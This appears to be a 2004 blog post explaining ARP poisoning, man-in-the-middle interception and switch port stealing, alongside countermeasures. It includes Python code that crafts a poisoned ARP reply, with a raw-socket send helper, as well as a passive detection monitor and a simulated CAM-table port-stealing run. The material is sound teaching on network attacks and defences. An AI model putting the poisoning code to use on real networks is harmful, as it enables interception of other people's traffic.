Tuesday, November 09, 2004

ARP poisoning, port stealing and MITM.

ARP poisoning:

As explained here, one can craft ARP packets that bind an IP address to the attacker's MAC address in order to poison a peer's ARP cache: the sender IP field carries the IP address you want to impersonate (the gateway, say) and the sender MAC field carries your own MAC, so the existing entry for that IP in the victim's cache is overwritten with your MAC address. The next packet the victim sends to that IP address lands on your interface; enable IP forwarding (or relay the packets yourself) so the traffic still reaches its real destination and nothing visibly breaks. Since ARP cache entries expire, the bogus ARP packet has to be resent periodically, and different types of ARP messages (replies, requests, gratuitous ARP) may be needed to poison the caches of different hardware/OS peers.

The ARP protocol is stateless. Most OSes update their caches with ARP replies they never solicited. Some, like Solaris, are a little tougher, but in that case one can trigger an ARP request with a spoofed ICMP echo request: you ping the target with the IP address you want to impersonate as source IP and the attacker's MAC as source MAC, which forces the target to issue an ARP request for that IP, after which you send the fake ARP reply. ARP poisoning can be countered by active/passive monitoring of IP-to-MAC bindings, static ARP entries (not flexible) or Secure ARP.
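As an added example (not code from the original post), here is the unsolicited ARP reply described above assembled byte by byte in Python, roughly what libnet builds for you, together with the passive IP-to-MAC monitor mentioned as a countermeasure. The MAC and IP addresses are made up for the example, and the `send_frame` helper (Linux raw socket, needs CAP_NET_RAW) is included for completeness but never called.

```python
import socket
import struct

# Constructed addresses for this example (assumptions, not from the post).
ATTACKER_MAC = "00:0c:29:aa:bb:cc"   # our interface
VICTIM_MAC   = "00:50:56:11:22:33"   # host whose ARP cache we poison
VICTIM_IP    = "192.168.1.10"
GATEWAY_IP   = "192.168.1.1"         # IP we impersonate in the victim's cache

ETH_P_ARP   = 0x0806
ARP_REQUEST = 1
ARP_REPLY   = 2


def mac_bytes(mac):
    """'00:0c:29:aa:bb:cc' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying one ARP message (14-byte header + 28-byte ARP).

    An unsolicited reply with sender_ip = GATEWAY_IP and sender_mac = ours
    makes a permissive peer overwrite its cache entry for the gateway.
    """
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=Ethernet(1), ptype=IPv4(0x0800), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) for an Ethernet/ARP frame, else None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    return opcode, frame[22:28].hex(":"), socket.inet_ntoa(frame[28:32])


def monitor(frames):
    """Passive countermeasure: remember the first MAC seen for each IP and
    report every later ARP message that advertises a different one."""
    bindings, alerts = {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        _, mac, ip = parsed
        if ip in bindings and bindings[ip] != mac:
            alerts.append((ip, bindings[ip], mac))
        bindings.setdefault(ip, mac)
    return alerts


def send_frame(frame, iface="eth0"):
    """Put a frame on the wire (Linux only, needs CAP_NET_RAW). Not called here.
    In a real run the poisoning reply is resent before the cache entry expires."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)


if __name__ == "__main__":
    poison = build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    legit = build_arp(ARP_REPLY, "00:11:22:33:44:55", GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    print(poison.hex())
    print(monitor([legit, poison]))
```

The same builder produces the ARP request you would send first against a peer that ignores unsolicited replies (`opcode=ARP_REQUEST`); the monitor is the simplest form of the passive detection mentioned above and will also fire on a legitimate NIC swap, which is why it alerts rather than blocks.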

MITM Attack:

Sniffing alone lets you observe traffic, but it does not put you on the path: the target host still receives its packets whether or not you saw them first. ARP poisoning gets you a real MITM (Man In The Middle) attack, where the attacker sits between two hosts, listening to and relaying their traffic without either host being able to tell. The actions available to the MITM are numerous: injection (commands, malicious code inserted into JavaScript, etc., which of course requires rewriting TCP sequence numbers on the connection), key manipulation, filtering, etc.

Port stealing:

Port stealing is an alternative way to get MITM on a switched network segment when the hosts' ARP caches cannot be poisoned (static entries, hardened OS). Instead of lying to the hosts, you lie to the switch: you flood it with frames whose source MAC address is that of the host you want to intercept traffic for (and whose destination MAC is your own, so the frames go nowhere else), so the switch updates its CAM table and maps the victim's MAC to your port. Traffic for the victim is then delivered to you. Once a frame is captured, the CAM entry has to be restored before you can forward it to its rightful destination, typically by sending an ARP request for the victim's IP so that its reply re-teaches the switch the real port. This steal/restore cycle has to be repeated for every packet, which is a lot of work, and traffic may be dropped in the meantime. Port stealing can be circumvented by enabling port security on the switch (binding each port to known MAC addresses).
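To make the steal/restore cycle concrete, here is an added example (not from the original post) that models a learning switch's CAM table in Python and runs one round of port stealing against it. The topology (victim on port 1, gateway on port 2, attacker on port 3) and the MAC addresses are made up; the ARP request/reply used to restore the entry is modelled as plain frames rather than real ARP.

```python
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed topology for this example (assumption): victim on port 1,
# gateway on port 2, attacker on port 3.
VICTIM_MAC   = "00:50:56:11:22:33"
GATEWAY_MAC  = "00:50:56:00:00:01"
ATTACKER_MAC = "00:0c:29:aa:bb:cc"


class Switch:
    """Minimal learning switch: the CAM table maps a MAC to the port it was
    last seen as a *source* on. That last-writer-wins learning is exactly
    what port stealing abuses."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.cam = {}

    def forward(self, in_port, src_mac, dst_mac, payload):
        """Learn src_mac on in_port, then return the list of egress ports."""
        self.cam[src_mac] = in_port
        if dst_mac in self.cam:
            return [self.cam[dst_mac]]
        return [p for p in self.ports if p != in_port]   # unknown/broadcast: flood


def steal_port(switch, attacker_port, attacker_mac, victim_mac):
    """Send a frame whose source is the victim's MAC. Destination is our own
    MAC, so the switch learns the bogus binding but nobody else sees the frame."""
    return switch.forward(attacker_port, victim_mac, attacker_mac, b"steal")


def restore_port(switch, attacker_port, attacker_mac, victim_port, victim_mac):
    """Put the real binding back: broadcast an ARP request for the victim
    (modelled as a broadcast frame) and let its reply, sent from the victim's
    real port, re-teach the switch."""
    switch.forward(attacker_port, attacker_mac, BROADCAST, b"arp who-has victim")
    switch.forward(victim_port, victim_mac, attacker_mac, b"arp is-at victim")


def port_stealing_demo():
    sw = Switch(ports=[1, 2, 3])
    sw.forward(1, VICTIM_MAC, GATEWAY_MAC, b"hello")     # switch learns victim@1
    sw.forward(2, GATEWAY_MAC, VICTIM_MAC, b"hi")        # gateway@2
    sw.forward(3, ATTACKER_MAC, GATEWAY_MAC, b"noise")   # attacker@3
    r = {"before": sw.cam[VICTIM_MAC]}

    steal_port(sw, 3, ATTACKER_MAC, VICTIM_MAC)
    r["stolen"] = sw.cam[VICTIM_MAC]
    # The gateway's next frame for the victim is delivered to port 3 (us).
    r["intercepted_on"] = sw.forward(2, GATEWAY_MAC, VICTIM_MAC, b"secret")

    restore_port(sw, 3, ATTACKER_MAC, 1, VICTIM_MAC)
    r["restored"] = sw.cam[VICTIM_MAC]
    # Relay the captured frame with its original source MAC. The switch now
    # learns the gateway on our port as well, so the steal/restore cycle has
    # to run again for the next frame in either direction.
    r["relayed_to"] = sw.forward(3, GATEWAY_MAC, VICTIM_MAC, b"secret")
    r["gateway_after_relay"] = sw.cam[GATEWAY_MAC]
    return r


if __name__ == "__main__":
    for k, v in port_stealing_demo().items():
        print(f"{k}: {v}")
```

The last two results are the point of the exercise: the frame does reach the victim, but only after the restore round trip, and relaying it has already re-poisoned the gateway's entry, so every frame costs an ARP exchange plus a fresh steal. Port security, which pins a port to a fixed set of source MACs, breaks the very first `steal_port` frame.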

More info on that here, here and here.

Of course, all this rogue packet crafting is done using libnet.
